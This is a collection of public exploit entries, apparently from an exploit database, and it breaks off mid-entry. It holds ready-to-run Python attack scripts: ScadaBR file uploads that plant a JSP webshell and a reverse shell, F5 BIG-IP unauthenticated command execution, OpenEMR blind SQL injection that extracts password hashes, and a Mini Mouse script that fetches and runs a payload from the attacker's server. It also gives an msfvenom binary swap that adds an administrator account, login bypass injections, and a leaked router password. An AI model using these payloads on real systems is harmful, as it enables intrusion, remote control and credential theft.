Type: UNION query Title: MySQL UNION query (NULL) - 22 columns Payload: txtaccesscode=111' UNION ALL SELECT CONCAT(0x716b627a71,0x7577616c424c7a446a4c7854717a7372696c7145414e4e5a597a4e76784e616e6f48635971446b44,0x71786a7071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&btnsubmit=Submit --- [16:29:27] [INFO] the back-end DBMS is MySQL web server operating system: Linux Ubuntu 20.04 or 19.10 (focal or eoan) web application technology: Apache 2.4.41 back-end DBMS: MySQL >= 5.6

# Exploit Title: ScadaBR 1.0 - Arbitrary File Upload (Authenticated) (1) # Date: 03/2021 # Exploit Author: Fellipe Oliveira # Vendor Homepage: https://www.scadabr.com.br/ # Version: ScadaBR 1.0, ScadaBR 1.1CE and ScadaBR 1.0 for Linux # Tested on: Windows7, Windows10 #!/usr/bin/python import requests,sys,time if len(sys.argv) <=4: print('[x] Missing arguments ... ') print('[>] Usage: python WinScada_RCE.py <TargetIp> <TargetPort> <User> <Password>') print('[>] Example: python WinScada_RCE.py 192.168.1.24 8080 admin admin') sys.exit(0) else: time.sleep(1) host = sys.argv[1] port = sys.argv[2] user = sys.argv[3] passw = sys.argv[4] flag = False LOGIN = 'http://'+host+':'+port+'/ScadaBR/login.htm' PROTECTED_PAGE = 'http://'+host+':'+port+'/ScadaBR/view_edit.shtm' banner = ''' +-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-+ | _________ .___ ____________________ | | / _____/ ____ _____ __| _/____ \______ \______ \ | | \_____ \_/ ___\\__ \ / __ |\__ \ | | _/| _/ | | / \ \___ / __ \_/ /_/ | / __ \| | \| | \ | | /_______ /\___ >____ /\____ |(____ /______ /|____|_ / | | \/ \/ \/ \/ \/ \/ \/ | | | | > ScadaBR 1.0 ~ 1.1 CE Arbitrary File Upload | | > Exploit Author : Fellipe Oliveira | | > Exploit for Windows Systems | +-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-+ ''' def main(): payload = { 'username': user, 'password': passw } print(banner) time.sleep(2) with requests.session() as s: s.post(LOGIN, data=payload) response = s.get(PROTECTED_PAGE) print("[+] Trying to authenticate "+LOGIN+"...") if response.status_code == 200: print("[+] Successfully authenticated! :D~\n") time.sleep(2) else: print("[x] Authentication failed :(") sys.exit(0) burp0_url = "http://"+host+":"+port+"/ScadaBR/view_edit.shtm" burp0_cookies = {"JSESSIONID": "66E47DFC053393AFF6C2D5A7C15A9439"} burp0_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "multipart/form-data; boundary=---------------------------6150838712847095098536245849", "Origin": "http://"+host+":"+port+"/", "Connection": "close", "Referer": "http://"+host+":"+port+"/ScadaBR/view_edit.shtm", "Upgrade-Insecure-Requests": "1"} burp0_data = "-----------------------------6150838712847095098536245849\r\nContent-Disposition: form-data; name=\"view.name\"\r\n\r\n\r\n-----------------------------6150838712847095098536245849\r\nContent-Disposition: form-data; name=\"view.xid\"\r\n\r\nGV_218627\r\n-----------------------------6150838712847095098536245849\r\nContent-Disposition: form-data; name=\"backgroundImageMP\"; filename=\"win_cmd.jsp\"\r\nContent-Type: application/octet-stream\r\n\r\n<%@ page import=\"java.util.*,java.io.*\"%>\n<%\n%>\n<HTML><BODY>\nCommands with JSP\n<FORM METHOD=\"GET\" NAME=\"myform\" ACTION=\"\">\n<INPUT TYPE=\"text\" NAME=\"cmd\">\n<INPUT TYPE=\"submit\" VALUE=\"Send\">\n</FORM>\n<pre>\n<%\nif (request.getParameter(\"cmd\") != null) {\n out.println(\"Command: \" + request.getParameter(\"cmd\") + \"<BR>\");\n Process p;\n if ( System.getProperty(\"os.name\").toLowerCase().indexOf(\"windows\") != -1){\n p = Runtime.getRuntime().exec(\"cmd.exe /C \" + request.getParameter(\"cmd\"));\n }\n else{\n p = Runtime.getRuntime().exec(request.getParameter(\"cmd\"));\n }\n OutputStream os = p.getOutputStream();\n InputStream in = p.getInputStream();\n DataInputStream dis = new DataInputStream(in);\n String disr = dis.readLine();\n while ( disr != null ) {\n out.println(disr);\n disr = dis.readLine();\n }\n}\n%>\n</pre>\n</BODY></HTML>\n\r\n-----------------------------6150838712847095098536245849\r\nContent-Disposition: form-data; name=\"upload\"\r\n\r\nUpload image\r\n-----------------------------6150838712847095098536245849\r\nContent-Disposition: form-data; name=\"view.anonymousAccess\"\r\n\r\n0\r\n-----------------------------6150838712847095098536245849--\r\n" getdata = s.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data) print('[>] Attempting to upload .jsp Webshell...') time.sleep(1) print('[>] Verifying shell upload...\n') time.sleep(2) if getdata.status_code == 200: print('[+] Upload Successfuly!') for num in range(1,500): PATH = 'http://'+host+':'+port+'/ScadaBR/uploads/%d.jsp' % (num) find = s.get(PATH) if find.status_code == 200: print('[+] Webshell Found in: http://'+host+':'+port+'/ScadaBR/uploads/%d.jsp' % (num)) flag = True print('[>] Spawning fake shell...') time.sleep(3) while flag: param = raw_input("# ") burp0_url = "http://"+host+":"+port+"/ScadaBR/uploads/%d.jsp?cmd=%s" % (num,param) burp0_cookies = {"JSESSIONID": "4FCC12402B8389A64905F4C8272A64B5"} burp0_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Referer": "http://"+host+":"+port+"/ScadaBR/uploads/%d.jsp?cmd=%s", "Upgrade-Insecure-Requests": "1"} send = s.get(burp0_url, headers=burp0_headers, cookies=burp0_cookies) clean = send.text.replace('<pre>', '').replace('<FORM METHOD=', '').replace('<HTML><BODY>', '').replace('"GET" NAME="myform" ACTION="">', '').replace('Commands with JSP', '').replace('<INPUT TYPE="text" NAME="cmd">', '').replace('<INPUT TYPE="submit" VALUE="Send">', '').replace('</FORM>', '').replace('<BR>', '').replace('</pre>', '').replace('</BODY></HTML>', '') print(clean) elif num == 499: print('[x] Webshell not Found') else: print('Reason:'+getdata.reason+' ') print('Exploit Failed x_x') if __name__ == '__main__': main()

# Exploit Title: phpPgAdmin 7.13.0 - COPY FROM PROGRAM Command Execution (Authenticated) # Date: 29/03/2021 # Exploit Author: Valerio Severini # Vendor Homepage: Software Link: https://github.com/phppgadmin/phppgadmin/releases/tag/REL_7-13-0 # Version: 7.13.0 or lower # Tested on: Debian 10 and Ubuntu Description: phpPgAdmin through 7.13.0 allows remote authenticated users to execute arbitrary code. An attacker can create a table named cmd_exec with one column, add type=text and cmd_out, and try to execute the query via a SQL tab. It will fail because of restrictions on statements. However, the attacker can bypass this step by uploading a .txt file (containing a SQL statement such as "COPY cmd_exec FROM PROGRAM" followed by OS commands) in the Browse bar. This achieves remote command execution via a "SELECT * FROM cmd_exec" statement. Attack Vectors (PoC): 1) you have to create a table manually and call it "cmd_exec" with 1 column 2) add cmd_output and type = text 3) try to execute the query via SQL tabs , but it should fail because of restriction of Statement. 4) A malicious Attacker could bypass this step uploading a .txt file in "Browse" bar, with a SQL malicious query inside, for example: " COPY cmd_exec FROM PROGRAM 'id; cd /root; ls'; " 5) The attacker could execute Remote command execution and obtain full access control executing in SQL query: " SELECT * FROM cmd_exec; "

# Exploit Title: ScadaBR 1.0 - Arbitrary File Upload (Authenticated) (2) # Date: 04/21 # Exploit Author: Fellipe Oliveira # Vendor Homepage: https://www.scadabr.com.br/ # Version: ScadaBR 1.0, ScadaBR 1.1CE and ScadaBR 1.0 for Linux # Tested on: Debian9,10~Ubuntu16.04 #!/usr/bin/python import requests,sys,time if len(sys.argv) <=6: print('[x] Missing arguments ... ') print('[>] Usage: python LinScada_RCE.py <TargetIp> <TargetPort> <User> <Password> <Reverse_IP> <Reverse_Port>') print('[>] Example: python LinScada_RCE.py 192.168.1.24 8080 admin admin 192.168.1.50 4444') sys.exit(0) else: time.sleep(1) host = sys.argv[1] port = sys.argv[2] user = sys.argv[3] passw = sys.argv[4] rev_host = sys.argv[5] rev_port = sys.argv[6] flag = False LOGIN = 'http://'+host+':'+port+'/ScadaBR/login.htm' PROTECTED_PAGE = 'http://'+host+':'+port+'/ScadaBR/view_edit.shtm' banner = ''' +-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-+ | _________ .___ ____________________ | | / _____/ ____ _____ __| _/____ \______ \______ \ | | \_____ \_/ ___\\__ \ / __ |\__ \ | | _/| _/ | | / \ \___ / __ \_/ /_/ | / __ \| | \| | \ | | /_______ /\___ >____ /\____ |(____ /______ /|____|_ / | | \/ \/ \/ \/ \/ \/ \/ | | | | > ScadaBR 1.0 ~ 1.1 CE Arbitrary File Upload | | > Exploit Author : Fellipe Oliveira | | > Exploit for Linux Systems | +-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-+ ''' def main(): payload = { 'username': user, 'password': passw } print(banner) time.sleep(2) with requests.session() as s: s.post(LOGIN, data=payload) response = s.get(PROTECTED_PAGE) print "[+] Trying to authenticate "+LOGIN+"..." if response.status_code == 200: print "[+] Successfully authenticated! :D~\n" time.sleep(2) else: print "[x] Authentication failed :(" sys.exit(0) burp0_url = "http://"+host+":"+port+"/ScadaBR/view_edit.shtm" burp0_cookies = {"JSESSIONID": "8DF449C72D2F70704B8D997971B4A06B"} burp0_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "multipart/form-data; boundary=---------------------------32124376735876620811763441977", "Origin": "http://"+host+":"+port+"/", "Connection": "close", "Referer": "http://"+host+":"+port+"/ScadaBR/view_edit.shtm", "Upgrade-Insecure-Requests": "1"} burp0_data = "-----------------------------32124376735876620811763441977\r\nContent-Disposition: form-data; name=\"view.name\"\r\n\r\n\r\n-----------------------------32124376735876620811763441977\r\nContent-Disposition: form-data; name=\"view.xid\"\r\n\r\nGV_369755\r\n-----------------------------32124376735876620811763441977\r\nContent-Disposition: form-data; name=\"backgroundImageMP\"; filename=\"webshell.jsp\"\r\nContent-Type: image/png\r\n\r\n <%@page import=\"java.lang.*\"%>\n<%@page import=\"java.util.*\"%>\n<%@page import=\"java.io.*\"%>\n<%@page import=\"java.net.*\"%>\n\n<%\nclass StreamConnector extends Thread {\n InputStream is;\n OutputStream os;\n StreamConnector(InputStream is, OutputStream os) {\n this.is = is;\n this.os = os;\n }\n public void run() {\n BufferedReader isr = null;\n BufferedWriter osw = null;\n try {\n isr = new BufferedReader(new InputStreamReader(is));\n osw = new BufferedWriter(new OutputStreamWriter(os));\n char buffer[] = new char[8192];\n int lenRead;\n while ((lenRead = isr.read(buffer, 0, buffer.length)) > 0) {\n osw.write(buffer, 0, lenRead);\n osw.flush();\n }\n } catch (Exception e) {\n System.out.println(\"exception: \" + e.getMessage());\n }\n try {\n if (isr != null)\n isr.close();\n if (osw != null)\n osw.close();\n } catch (Exception e) {\n System.out.println(\"exception: \" + e.getMessage());\n }\n }\n}\n%>\n\n<h1>Payload JSP to Reverse Shell</h1>\n<p>Run nc -l 1234 on your client (127.0.0.1) and click Connect. This JSP will start a bash shell and connect it to your nc process</p>\n<form method=\"get\">\n\tIP Address<input type=\"text\" name=\"ipaddress\" size=30 value=\"127.0.0.1\"/>\n\tPort<input type=\"text\" name=\"port\" size=10 value=\"1234\"/>\n\t<input type=\"submit\" name=\"Connect\" value=\"Connect\"/>\n</form>\n\n<%\n String ipAddress = request.getParameter(\"ipaddress\");\n String ipPort = request.getParameter(\"port\");\n Socket sock = null;\n Process proc = null;\n if (ipAddress != null && ipPort != null) {\n try {\n sock = new Socket(ipAddress, (new Integer(ipPort)).intValue());\n System.out.println(\"socket created: \" + sock.toString());\n Runtime rt = Runtime.getRuntime();\n proc = rt.exec(\"/bin/bash\");\n System.out.println(\"process /bin/bash started: \" + proc.toString());\n StreamConnector outputConnector = new StreamConnector(proc.getInputStream(), sock.getOutputStream());\n System.out.println(\"outputConnector created: \" + outputConnector.toString());\n StreamConnector inputConnector = new StreamConnector(sock.getInputStream(), proc.getOutputStream());\n System.out.println(\"inputConnector created: \" + inputConnector.toString());\n outputConnector.start();\n inputConnector.start();\n } catch (Exception e) {\n System.out.println(\"exception: \" + e.getMessage());\n }\n }\n if (sock != null && proc != null) {\n out.println(\"<div class='separator'></div>\");\n out.println(\"<p>Process /bin/bash, running as (\" + proc.toString() + \", is connected to socket \" + sock.toString() + \".</p>\");\n }\n%>\n\n\r\n-----------------------------32124376735876620811763441977\r\nContent-Disposition: form-data; name=\"upload\"\r\n\r\nUpload image\r\n-----------------------------32124376735876620811763441977\r\nContent-Disposition: form-data; name=\"view.anonymousAccess\"\r\n\r\n0\r\n-----------------------------32124376735876620811763441977--\r\n" getdata = s.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data) print('[>] Attempting to upload .jsp Webshell...') time.sleep(1) print('[>] Verifying shell upload...\n') time.sleep(2) if getdata.status_code == 200: print('[+] Upload Successfuly! \n') for num in range(1,1000): PATH = 'http://'+host+':'+port+'/ScadaBR/uploads/%d.jsp' % (num) find = s.get(PATH) if find.status_code == 200: print('[+] Webshell Found in: http://'+host+':'+port+'/ScadaBR/uploads/%d.jsp' % (num)) print('[>] Spawning Reverse Shell...\n') time.sleep(3) burp0_url = "http://"+host+":"+port+"/ScadaBR/uploads/%d.jsp?ipaddress=%s&port=%s&Connect=Connect" % (num,rev_host,rev_port) burp0_cookies = {"JSESSIONID": "8DF449C72D2F70704B8D997971B4A06B"} burp0_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Upgrade-Insecure-Requests": "1"} r = s.get(burp0_url, headers=burp0_headers, cookies=burp0_cookies) time.sleep(5) if len(r.text) > 401: print('[+] Connection received') sys.exit(0) else: print('[x] Failed to receive reverse connection ...\n') elif num == 999: print('[x] Failed to found Webshell ... ') else: print('Reason:'+getdata.reason+' ') print('Exploit Failed x_x') if __name__ == '__main__': main()

# Exploit Title: ZBL EPON ONU Broadband Router 1.0 - Remote Privilege Escalation # Date: 31.01.2021 # Exploit Author: LiquidWorm # Vendor Homepage: http://www.zblchina.com http://www.wd-thailand.com Vendor: Zhejiang BC&TV Technology Co., Ltd. (ZBL) | W&D Corporation (WAD TECHNOLOGY (THAILAND)) Product web page: http://www.zblchina.com | http://www.wd-thailand.com Affected version: Firmwre: V100R001 Software model: HG104B-ZG-E / EONU-7114 / ZBL5932C CATV+PON Triple CPE EONU Hardware Version V3.0 Software: V2.46.02P6T5S Main Chip: RTL9607 Master Controller, Copyright (c) R&D Summary: EONU-x GEPON ONU layer-3 home gateway/CPE broadband router. Desc: The application suffers from a privilege escalation vulnerability. The limited administrative user (admin:admin) can elevate his/her privileges by sending a HTTP GET request to the configuration backup endpoint or the password page and disclose the http super user password. Once authenticated as super, an attacker will be granted access to additional and privileged functionalities. Tested on: GoAhead-Webs/2.5.0 PeerSec-MatrixSSL/3.1.3-OPEN Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2021-5467 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5647.php 31.01.2021 -- Get config file and disclose super pwd: --------------------------------------- POST /HG104B-ZG-E.config HTTP/1.1 Host: 192.168.1.1 Connection: keep-alive Content-Length: 42 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: https://192.168.1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: https://192.168.1.1/system_configure.asp Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9,mk;q=0.8,sr;q=0.7,hr;q=0.6 CMD=CONFIG&GO=index.asp&TYPE=CONFIG&files= ... #web_1 user_web_name=super user_web_password=www168nettv ... Disclose super pwd from system pwd page: ---------------------------------------- GET /system_password.asp Host: 192.168.1.1 ... var webVars = new Array( 'HG104B-ZG-E', '1', '0','2;1;2'); var sysadmin = new Array('600','1;super;www168nettv','1;admin;admin'); ...

# Exploit Title: Rockstar Service - Insecure File Permissions # Date: 2020-04-02 # Exploit Author: George Tsimpidas # Software Link : https://socialclub.rockstargames.com/rockstar-games-launcher # Version Patch: 1.0.37.349 # Tested on: Microsoft Windows 10 Home 10.0.18362 N/A Build 18362 Vulnerability Description: RockstarService.exe suffers from an elevation of privileges vulnerability which can be used by an "Authenticated User" to modify the existing executable file of the service with a binary of his choice. The vulnerability exist due to weak set of permissions being granted to the "Authenticated Users Group" which grants the (M) Flag aka "Modify Privilege" #PoC D:\Launcher> icacls .\Launcher.exe .\Launcher.exe BUILTIN\Administrators:(I)(F) NT AUTHORITY\SYSTEM:(I)(F) NT AUTHORITY\Authenticated Users:(I)(M) BUILTIN\Users:(I)(RX) #1. Create low privileged user & Login to that user C:\>net user lowpriv Password123! /add C:\>net user lowpriv | findstr /i "Membership Name" | findstr /v "Full" User name lowpriv Local Group Memberships *Users Global Group memberships *None #2. Move the RockstarService.exe to a new name D:\Launcher> move RockstarService.exe RockstarService.exe.bk 1 file(s) moved. #3. Create malicious binary on kali linux with MSF msfvenom -f exe -p windows/exec CMD="net user placebo Password123! /add && net localgroup Administrators placebo /add" -o RockstarService.exe #4. Transfer created 'RockstarService.exe' to the Windows Host #5. Move the created 'RockstarService.exe' binary to the 'D:\Launcher' to replace the old one #6. Now start the Service Command : net start 'Rockstar Service' Now check out that the user has been registered to the system and added to the local group of Administrators C:\Users\lowpriv>net user placebo | findstr /i "Membership Name" | findstr /v "Full" User name placebo Local Group Memberships *Administrators *Users Global Group memberships *None

# Exploit Title: F5 BIG-IP 16.0.x - iControl REST Remote Code Execution (Unauthenticated) # Exploit Author: Al1ex # Vendor Homepage: https://www.f5.com/products/big-ip-services # Version: 16.0.x before 16.0.1.1, 15.1.x before 15.1.2.1, 14.1.x before 14.1.4, 13.1.x before 13.1.3.6, and 12.1.x before 12.1.5.3 amd BIG-IQ 7.1.0.x before 7.1.0.3 and 7.0.0.x before 7.0.0.2 # CVE : CVE-2021-22986 import requests from requests.packages.urllib3.exceptions import InsecureRequestWarning requests.packages.urllib3.disable_warnings(InsecureRequestWarning) import sys def title(): print(''' ______ ____ ____ _______ ___ ___ ___ __ ___ ___ ___ ___ __ / |\ \ / / | ____| |__ \ / _ \ |__ \ /_ | |__ \ |__ \ / _ \ / _ \ / / | ,----' \ \/ / | |__ ______ ) | | | | | ) | | | ______ ) | ) | | (_) | | (_) | / /_ | | \ / | __| |______/ / | | | | / / | | |______/ / / / \__, | > _ < | '_ \ | `----. \ / | |____ / /_ | |_| | / /_ | | / /_ / /_ / / | (_) | | (_) | \______| \__/ |_______| |____| \___/ |____| |_| |____| |____| /_/ \___/ \___/ Author:Al1ex@Heptagram Github:https://github.com/Al1ex ''') def exploit(url): target_url = url + '/mgmt/shared/authn/login' data = { "bigipAuthCookie":"", "username":"admin", "loginReference":{"link":"/shared/gossip"}, "userReference":{"link":"https://localhost/mgmt/shared/authz/users/admin"} } headers = { "User-Agent": "hello-world", "Content-Type":"application/x-www-form-urlencoded" } response = requests.post(target_url, headers=headers, json=data, verify=False, timeout=15) if "/mgmt/shared/authz/tokens/" not in response.text: print('(-) Get token fail !!!') print('(*) Tested Method 2:') header_2 = { 'User-Agent': 'hello-world', 'Content-Type': 'application/json', 'X-F5-Auth-Token': '', 'Authorization': 'Basic YWRtaW46QVNhc1M=' } data_2 = { "command": "run", "utilCmdArgs": "-c whoami" } check_url = url + '/mgmt/tm/util/bash' try: response2 = requests.post(url=check_url, json=data_2, headers=header_2, verify=False, timeout=20) if response2.status_code == 200 and 'commandResult' in response2.text: while True: cmd = input("(:CMD)> ") data_3 = {"command": "run", "utilCmdArgs": "-c '%s'"%(cmd)} r = requests.post(url=check_url, json=data_3, headers=header_2, verify=False) if r.status_code == 200 and 'commandResult' in r.text: print(r.text.split('commandResult":"')[1].split('"}')[0].replace('\\n', '')) else: print('(-) Not vuln...') exit(0) except Exception: print('ERROR Connect') print('(+) Extract token: %s'%(response.text.split('"selfLink":"https://localhost/mgmt/shared/authz/tokens/')[1].split('"}')[0])) while True: cmd = input("(:CMD)> ") headers = { "Content-Type": "application/json", "X-F5-Auth-Token": "%s"%(response.text.split('"selfLink":"https://localhost/mgmt/shared/authz/tokens/')[1].split('"}')[0]) } data_json = { "command": "run", "utilCmdArgs": "-c \'%s\'"%(cmd) } exp_url= url + '/mgmt/tm/util/bash' exp_req = requests.post(exp_url, headers=headers, json=data_json, verify=False, timeout=15) if exp_req.status_code == 200 and 'commandResult' in exp_req.text: print(exp_req.text.split('commandResult":"')[1].split('"}')[0].replace('\\n', '')) else: print('(-) Not vuln...') exit(0) if __name__ == '__main__': title() if(len(sys.argv) < 2): print('[+] USAGE: python3 %s https://<target_url>\n'%(sys.argv[0])) exit(0) else: exploit(sys.argv[1])

# Exploit Title: Simple Food Website 1.0 - Authentication Bypass # Date: 2021-04-03 # Exploit Author: Viren Saroha (illusion) # Vendor Homepage: https://www.sourcecodester.com/php/12510/simple-food-website-php.html # Software Link: https://www.sourcecodester.com/download-code?nid=12510&title=Simple+Food+Website+%28CMS%29+in+PHP+with+Source+Code # Version: 1.0 # Tested on: Windows 10/Kali Linux POC Step 1 - Go to url http://localhost/food/admin/login.php Step 2 – Enter anything in username and password Step 3 – Click on Login and capture the request in burpsuite Step 4 – Change the username to ' or '1'='1'# Step 5 – Click forward and now you will be logged in as admin. REQUEST POST /food/admin/process_login.php HTTP/1.1 Host: 192.168.132.128 Content-Length: 76 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://192.168.132.128 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://192.168.132.128/food/admin/login.php Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=44189551c332ee92a95246aac0756dd3 Connection: close username=%27+or+%271%27%3D%271%27%23&password=randomPassword&Sign+In=Sign+In

# Exploit Title: Basic Shopping Cart 1.0 - Authentication Bypass # Date: 2021-04-03 # Exploit Author: Viren Saroha (illusion) # Vendor Homepage: https://www.sourcecodester.com/php/10964/basic-shopping-cartphpmysql.html # Software Link: https://www.sourcecodester.com/download-code?nid=10964&title=Basic+Shopping+Cart+using+PHP%2FMySQL+with+Source+Code # Version: 1.0 # Tested on: Windows 10/Kali Linux POC Step 1 - Go to url http://localhost/EdgeSketch/index.php and Click on Admin Step 2 – Enter anything in username and password Step 3 – Click on Login and capture the request in burpsuite Step4 – Change the username to ' or '1'='1'# Step 5 – Click forward and now you will be logged in as admin. REQUEST POST /EdgeSketch/adminlogin.php HTTP/1.1 Host: localhost Content-Length: 77 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://localhost Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://localhost/EdgeSketch/index.php Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=6b7072bb40c321cb336aacef057a0876 Connection: close admin_username=%27+or+%271%27%3D%271%27%23&admin_password=random&admin_login=

# Exploit Title: OpenEMR 4.1.0 - 'u' SQL Injection # Date: 2021-04-03 # Exploit Author: Michael Ikua # Vendor Homepage: https://www.open-emr.org/ # Software Link: https://github.com/openemr/openemr/archive/refs/tags/v4_1_0.zip # Version: 4.1.0 # Original Advisory: https://www.netsparker.com/web-applications-advisories/sql-injection-vulnerability-in-openemr/ #!/usr/bin/env python3 import requests import string import sys print(""" ____ ________ _______ __ __ ___ ____ / __ \____ ___ ____ / ____/ |/ / __ \ / // / < // __ \\ / / / / __ \/ _ \/ __ \/ __/ / /|_/ / /_/ / / // /_ / // / / / / /_/ / /_/ / __/ / / / /___/ / / / _, _/ /__ __/ / // /_/ / \____/ .___/\___/_/ /_/_____/_/ /_/_/ |_| /_/ (_)_(_)____/ /_/ ____ ___ __ _____ ____ __ _ / __ )/ (_)___ ____/ / / ___// __ \ / / (_) / /_/ / / / __ \/ __ / \__ \/ / / / / / / / / /_/ / / / / / / /_/ / ___/ / /_/ / / /___/ / /_____/_/_/_/ /_/\__,_/ /____/\___\_\/_____/_/ exploit by @ikuamike """) all = string.printable # edit url to point to your openemr instance url = "http://192.168.56.106/openemr/interface/login/validateUser.php?u=" def extract_users_num(): print("[+] Finding number of users...") for n in range(1,100): payload = '\'%2b(SELECT+if((select count(username) from users)=' + str(n) + ',sleep(3),1))%2b\'' r = requests.get(url+payload) if r.elapsed.total_seconds() > 3: user_length = n break print("[+] Found number of users: " + str(user_length)) return user_length def extract_users(): users = extract_users_num() print("[+] Extracting username and password hash...") output = [] for n in range(1,1000): payload = '\'%2b(SELECT+if(length((select+group_concat(username,\':\',password)+from+users+limit+0,1))=' + str(n) + ',sleep(3),1))%2b\'' #print(payload) r = requests.get(url+payload) #print(r.request.url) if r.elapsed.total_seconds() > 3: length = n break for i in range(1,length+1): for char in all: payload = '\'%2b(SELECT+if(ascii(substr((select+group_concat(username,\':\',password)+from+users+limit+0,1),'+ str(i)+',1))='+str(ord(char))+',sleep(3),1))%2b\'' #print(payload) r = requests.get(url+payload) #print(r.request.url) if r.elapsed.total_seconds() > 3: output.append(char) if char == ",": print("") continue print(char, end='', flush=True) try: extract_users() except KeyboardInterrupt: print("") print("[+] Exiting...") sys.exit()

# Exploit Title: Mini Mouse 9.2.0 - Remote Code Execution # Author: gosh # Date: 01-04-2021 # Vendor Homepage: http://yodinfo.com # Software Link: https://imgv.oss-cn-hangzhou.aliyuncs.com/minimouse.msi # Version: 9.2.0 # Tested on: Windows 10 Pro build 19042.662 #!/usr/bin/python3 import requests import json import jsonargparse from time import sleep ip = input("target's ip: ") lhost = input("local http server ip: ") name = input("payload file name: ") url = "http://{}:8039/op=command".format(ip) headers = {"Content-Type": "application/json", "Connection": "keep-alive", "Accept": "*/*", "User-Agent": "MiniMouse/9.3.0 (iPhone; iOS 14.4.2; Scale/2.00)", "Accept-Language": "en-TN;q=1, ar-TN;q=0.9, fr-TN;q=0.8", "Accept-Encoding": "gzip, deflate"} down = {"command_operate_type": 0, "name": "abc", "script": f"certutil.exe -urlcache -split -f http://{lhost}/{name} C:\\Windows\\Temp\\{name}", "time": 0, "type": 100000} r = requests.post(url, headers=headers, json=down) print("[+] Retrieving payload") sleep(1) shell={"command_operate_type": 0, "name": "abd", "script": f"start /B C:\\Windows\\Temp\\{name}", "time": 0, "type": 100000} s = requests.post(url, headers=headers, json=shell) print (r.status_code) print ("[+] got shell!")

# Exploit Title: Mini Mouse 9.2.0 - Path Traversal # Author: gosh # Date: 02-04-2021 # Vendor Homepage: http://yodinfo.com # Software Link: https://imgv.oss-cn-hangzhou.aliyuncs.com/minimouse.msi # Version: 9.2.0 # Tested on: Windows 10 Pro build 19042.662 POC GET /file=C:%5CWindows%5Cwin.ini HTTP/1.1 Host: 192.168.1.111:8039 Content-Type: application/json Connection: keep-alive Accept: */* User-Agent: MiniMouse/9.3.0 (iPhone; iOS 14.4.2; Scale/2.00) Accept-Language: en-TN;q=1, ar-TN;q=0.9, fr-TN;q=0.8 Content-Length: 0 Accept-Encoding: gzip, deflate {} ....................................................... HTTP/1.1 200 OK Server: bruce_wy/1.0.0 Access-Control-Allow-Methods: POST,GET,TRACE,OPTIONS Access-Control-Allow-Headers: Content-Type,Origin,Accept Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: true P3P: CP=CAO PSA OUR Content-Type: application/octet-stream Content-Range: bytes 0-0/92 Content-Length : 92 ; for 16-bit app support [fonts] [extensions] [mci extensions] [files] [Mail] MAPI=1 second POC: POST /op=get_file_list HTTP/1.1 Host: 192.168.1.111:8039 Content-Type: application/json Connection: keep-alive Accept: */* User-Agent: MiniMouse/9.3.0 (iPhone; iOS 14.4.2; Scale/2.00) Accept-Language: en-TN;q=1, ar-TN;q=0.9, fr-TN;q=0.8 Content-Length: 28 Accept-Encoding: gzip, deflate {"path":"C:\\Users\\Public"} ............................................................. HTTP/1.1 200 OK Server: bruce_wy/1.0.0 Access-Control-Allow-Methods: 